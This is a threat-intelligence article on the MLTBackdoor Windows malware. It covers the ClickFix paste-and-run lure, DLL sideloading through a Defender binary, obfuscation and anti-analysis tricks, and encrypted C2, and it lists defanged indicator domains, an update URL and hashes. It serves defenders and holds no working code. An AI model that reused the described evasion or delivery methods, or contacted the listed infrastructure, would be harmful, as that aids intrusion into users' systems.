MLTBackdoor Malware Uses ClickFix Lures to Gain Access to Windows Systems

Security researchers have uncovered a new Windows backdoor called MLTBackdoor that spreads through a multi-stage ClickFix infection chain and gives attackers a foothold on infected machines.

The malware was identified in May 2026 by Zscaler ThreatLabz, which says MLTBackdoor is likely used by a ransomware-related threat actor. According to the Zscaler ThreatLabz analysis, the backdoor can download and upload files, list directories, delete files, rename items, create folders, and load Beacon Object Files to expand its capabilities.

The attack begins with a ClickFix lure on an automotive-related web page. The victim is tricked into copying and running a command, which starts the full infection chain and eventually loads MLTBackdoor on the system.

MLTBackdoor starts with a ClickFix social engineering trick

ClickFix attacks rely on the user doing the execution for the attacker. A fake error, fake CAPTCHA, or fake fix prompt tells the user to copy and paste a command into Windows Run, Command Prompt, or PowerShell.

This technique is now documented by MITRE ATT&CK as Malicious Copy and Paste, tracked as T1204.004. MITRE says attackers use this method to convince users to run malicious code directly in a command or scripting interpreter.

That social engineering step helps attackers bypass some browser and email protections because the user manually runs the command. Red Canary has also warned that paste-and-run attacks have become a major initial access trend, with several recent threat clusters using ClickFix-style lures.

Threat name	MLTBackdoor
Discovery	May 2026
Reported by	Zscaler ThreatLabz
Initial access method	ClickFix lure on an automotive-related web page
Main risk	Backdoor access, file operations, and expandable post-exploitation capability
Likely use case	Foothold for lateral movement in ransomware-related activity
Primary platform	Windows

The infection chain uses a disguised archive and DLL sideloading

After the victim runs the ClickFix command, the chain creates a temporary folder and downloads a compressed archive from a domain generated by the malware’s domain generation algorithm.

The archive contains two files, data.bin and endpointdlp.dll. The DLL decrypts the RC4-encrypted data.bin file, which contains the second-stage MLTBackdoor payload.

MLTBackdoor then performs a self-update and reuses the endpointdlp.dll filename. It sideloads the backdoor through mpextms.exe, a legitimate signed Microsoft Defender executable, which helps the malware hide behind a trusted binary.

• The lure starts on an automotive-themed web page.
• The victim copies and runs a fake fix command.
• The command downloads a compressed archive from attacker infrastructure.
• endpointdlp.dll decrypts data.bin using RC4.
• The decrypted payload loads MLTBackdoor.
• The malware uses mpextms.exe for DLL sideloading.

MLTBackdoor is built to slow down analysis

MLTBackdoor uses several techniques to make reverse engineering harder. It relies on Mixed Boolean-Arithmetic obfuscation, control flow flattening, stack-built strings, API hashing, and indirect system calls.

Zscaler says around 95% of the malware’s code consists of extra calculations that add noise. This does not improve normal malware function, but it makes the code much harder for researchers and automated tools to understand.

The backdoor also checks for virtualization, debugging tools, sandbox drivers, low RAM, single-CPU systems, short uptime, and other signs that it may be running in an analysis environment.

Evasion method	Purpose
Mixed Boolean-Arithmetic	Adds unnecessary math operations to hide simple logic
Control flow flattening	Makes the execution path harder to follow
Stack-built strings	Prevents simple static string extraction
API hashing	Hides direct Windows API references
Indirect system calls	May bypass user-mode monitoring hooks
Anti-analysis checks	Collects signals about sandboxes, debuggers, and virtual machines

The backdoor uses encrypted C2 traffic over port 443

Once active, MLTBackdoor communicates over TLS on port 443 using a custom encrypted binary protocol. It uses the fixed path /api/v1/telemetry and a Microsoft-style user-agent string to blend into normal-looking traffic.

The backdoor uses Elliptic-Curve Diffie-Hellman key exchange with the P-256 curve to create a shared secret. It then uses AES-256-GCM to encrypt later messages between the infected host and the command-and-control server.

Some MLTBackdoor samples contain hardcoded C2 domains, while others use a domain generation algorithm. This gives the malware a backup path if defenders block or seize known domains.

Why the BOF loader raises the risk

MLTBackdoor includes built-in commands for basic file system operations, but its Beacon Object File loader makes it more flexible. BOFs allow attackers to run additional post-exploitation modules in memory.

The technical report says this loader can dynamically add new capabilities without needing a large set of features built into the original malware binary.

That design can help attackers keep the backdoor smaller while still expanding what it can do after infection. It also makes detection harder because new functions may run in memory rather than appearing as separate files on disk.

• Download files from the victim system.
• Upload files to the victim system.
• List files in a directory.
• Delete files or folders.
• Rename or move files and folders.
• Create new folders.
• Load Beacon Object Files for extra post-exploitation tasks.

ClickFix attacks remain hard to stop with basic filtering

ClickFix campaigns work because they turn the user into the execution step. The command may come from a web page, fake CAPTCHA, fake browser error, or document prompt, but the result is the same: the user runs attacker-supplied code.

The Malicious Copy and Paste technique page notes that these attacks can involve fake errors or CAPTCHA prompts that tell users to open a terminal or Windows Run dialog and execute a command.

Red Canary’s ClickFix research also shows how quickly attackers change the commands and payloads used in paste-and-run campaigns. This makes detection rules based on one static command less reliable over time.

Indicators defenders should watch

Security teams should look for suspicious use of conhost.exe, cmd.exe, curl, tar, rundll32, and mpextms.exe in unusual sequences, especially when they run from user profile or temporary directories.

Network monitoring should also flag suspicious TLS traffic to unusual domains with the /api/v1/telemetry path, the Microsoft-Delivery-Optimization/10.1 user-agent string, or connections to domains linked to the campaign.

The following indicators come from public MLTBackdoor research and should be treated as starting points for threat hunting, not as the only possible signs of infection.

Type	Indicator	Description
SHA256	1e41c7bfaa6aa3b93b6cc024274a10e33f3e12fe7c98c1db387ef8927f9d1984	Stage one loader
SHA256	46b2155c1e71b840d4b7a2e94410b89a61e2446523e6f497206d402eb02e0e93	Archive with stage one loader and encrypted MLTBackdoor
SHA256	9e52cc90cff150abe21f0a6440e86e0a99ff383b81061b96def8948e21d0ac66	MLTBackdoor with domains and DGA
SHA256	ced6b0f44410f6133ad63b61e04613a8b56cc3338d7b34497540e9541163e7ec	MLTBackdoor DGA only
SHA256	1d09357b6a096fdc35cd5c873eed15665d6b3c879d20c8cf01e6bca0005512cf	MLTBackdoor DGA only
SHA256	2cd88d5280a61714836f5f07a16df190911c5b952af2998dbbcda910b3b1c494	MLTBackdoor domains only
SHA256	d34e4038c5c80728f9648ba84833f69bc1ccea82e2e8e748b7b7f02fb687b92b	MLTBackdoor update sideload archive
Domain	hrs2y15sungu[.]com	DGA domain used for distribution and C2
Domain	carrolc[.]com	MLTBackdoor C2
Domain	cwrtwright[.]com	MLTBackdoor C2
Domain	thomphon[.]com	MLTBackdoor C2
URL	powwowski[.]com/payloads/update.zip	MLTBackdoor update URL
File name	endpointdlp.dll	DLL used to decrypt and sideload the backdoor
File name	data.bin	RC4-encrypted second-stage payload
File name	mpextms.exe	Legitimate Microsoft Defender binary abused for DLL sideloading

How organizations can reduce exposure

Organizations should treat ClickFix as both a technical and training problem. Users need to know that websites should not ask them to paste commands into Windows tools, while security teams need detection for the process chains that follow those prompts.

The Red Canary analysis recommends focusing on behavior because paste-and-run campaigns change quickly. That approach fits MLTBackdoor as well, since the initial command chain, DLL sideloading, and unusual outbound traffic all provide hunting opportunities.

Defenders should also watch for legitimate Microsoft binaries launching unexpected DLLs from temporary folders. That pattern can point to DLL sideloading, especially when it appears after a browser, Run dialog, command prompt, or PowerShell session.

• Block or monitor suspicious copy-and-paste command execution from browsers.
• Alert on curl or tar activity launched from unusual user-driven command chains.
• Monitor rundll32 execution from temporary directories.
• Watch for mpextms.exe loading DLLs from unexpected paths.
• Block known MLTBackdoor hashes, domains, and URLs.
• Inspect TLS traffic patterns that use suspicious user-agent strings or fixed API paths.
• Train users not to run commands copied from web pages, CAPTCHA prompts, or fake fixes.

MLTBackdoor shows how ClickFix attacks can move from a simple user prompt to a full post-exploitation framework. The campaign combines social engineering, DLL sideloading, heavy obfuscation, encrypted C2, DGA fallback, and in-memory expansion through BOFs, making early detection especially important.

FAQ